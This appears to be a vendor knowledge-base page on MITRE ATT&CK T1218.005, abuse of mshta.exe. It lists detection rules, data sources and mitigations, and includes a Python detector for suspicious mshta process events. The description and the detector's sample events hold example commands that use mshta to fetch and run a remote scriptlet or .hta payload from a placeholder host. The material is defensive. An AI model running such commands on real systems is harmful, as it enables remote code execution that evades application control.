T1218.005: Mshta

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

mitre_attck_execution: PT-CR-1089: DotNetToJScript_Usage: Possible usage of the DotNetToJscript utility is detected
mitre_attck_defense_evasion: PT-CR-204: MSHTA_AWL_Bypass: An attempt to bypass application-start restrictions by using mshta.exe (a built-in Microsoft Windows utility that executes HTML applications (.hta))
mitre_attck_defense_evasion: PT-CR-650: Suspicious_File_Created_By_Legal_Process: Detects creation of suspicious files by legitimate processes
hacking_tools: PT-CR-353: Koadic_MSHTA_Stager: Possible use of Koadic software (Koadic framework is designed for post-exploitation in Windows family operating systems) that runs a payload on the attacked host using Microsoft Windows HTML Application was detected

Detection

ID: DS0009. Data source and component: Process: Process Creation. Description:

Use process monitoring to monitor the execution and arguments of mshta.exe.

ID: DS0017. Data source and component: Command: Command Execution. Description:

Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
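The command-line analysis described above, as an added example that is not part of the original page or of any Positive Technologies product: it scores constructed Sysmon-style process-creation events for mshta.exe against a hypothetical known-good .hta baseline and a list of parent processes that normally never launch mshta.exe.

```python
import re

# Constructed sample events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\Tool\help.hta"',
     "ParentImage": r"C:\Program Files\Vendor\Tool\tool.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://webserver/payload.hta",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Hypothetical baseline of .hta paths previously seen and vetted in this environment.
KNOWN_GOOD_HTA = {r"c:\program files\vendor\tool\help.hta"}
# Parents that normally have no reason to spawn mshta.exe (assumed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "powershell.exe"}

INLINE_SCRIPT = re.compile(r"\b(vbscript|javascript|about):", re.IGNORECASE)
REMOTE_URL = re.compile(r"\b(https?|ftp)://", re.IGNORECASE)
HTA_ARG = re.compile(r'"([^"]+\.hta)"|(\S+\.hta)', re.IGNORECASE)

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def analyze_event(event):
    """Return the reasons an mshta.exe event looks anomalous (empty list = benign)."""
    if basename(event["Image"]) != "mshta.exe":
        return []
    cmd, reasons = event["CommandLine"], []
    if INLINE_SCRIPT.search(cmd):            # raw script passed on the command line
        reasons.append("inline script protocol handler in arguments")
    if REMOTE_URL.search(cmd):               # .hta or scriptlet fetched from the network
        reasons.append("remote URL passed to mshta")
    parent = basename(event["ParentImage"])
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by {parent}")
    for quoted, bare in HTA_ARG.findall(cmd):  # local .hta not in the baseline
        path = (quoted or bare).lower()
        if not REMOTE_URL.match(path) and path not in KNOWN_GOOD_HTA:
            reasons.append(f"unbaselined .hta: {path}")
    return reasons

def flag_events(events):
    """Pair each anomalous command line with its reasons, skipping benign events."""
    return [(e["CommandLine"], r) for e in events for r in [analyze_event(e)] if r]
```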

ID: DS0029. Data source and component: Network Traffic: Network Connection Creation. Description:

Monitor for newly constructed network connections that are sent or received by untrusted hosts.

ID: DS0022. Data source and component: File: File Creation. Description:

Monitor use of HTA files. If they are not typically used within an environment, then execution of them may be suspicious.

Mitigation

ID: M1038. Name: Execution Prevention. Description:

Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the mshta.exe application and to prevent abuse.

ID: M1042. Name: Disable or Remove Feature or Program. Description:

Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.